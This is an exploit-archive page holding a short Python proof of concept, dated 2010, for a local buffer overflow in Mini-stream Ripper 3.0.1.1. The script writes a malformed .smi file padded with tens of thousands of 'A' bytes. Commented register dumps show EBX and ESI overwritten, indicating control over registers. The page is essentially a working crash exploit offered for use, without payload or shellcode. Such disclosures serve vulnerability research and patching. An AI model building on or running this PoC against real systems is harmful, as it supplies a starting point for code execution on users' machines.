[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC
# Published : 2010-01-19
# Author : d3b4g
# Previous Title : Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC
# Next Title : Muziic Player 2.0 (.mp3) Local Denial of Service (DoS)
#!/usr/bin/python
# Tested on: win XPsp3
# webpage: d3b4g.info
#EAX 00E1C880
#EDX 00000001
#EBX 41414141------------------------------------------------
#ESP 000D198C
#EBP 00E1C880 controle over registers
#ESI 41414141------------------------------------------------
#EDI 00E1C880
#EIP 00431302 Ripper.00431302
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 0 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
chars = "A"*90000
crush = "x41x41x41x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()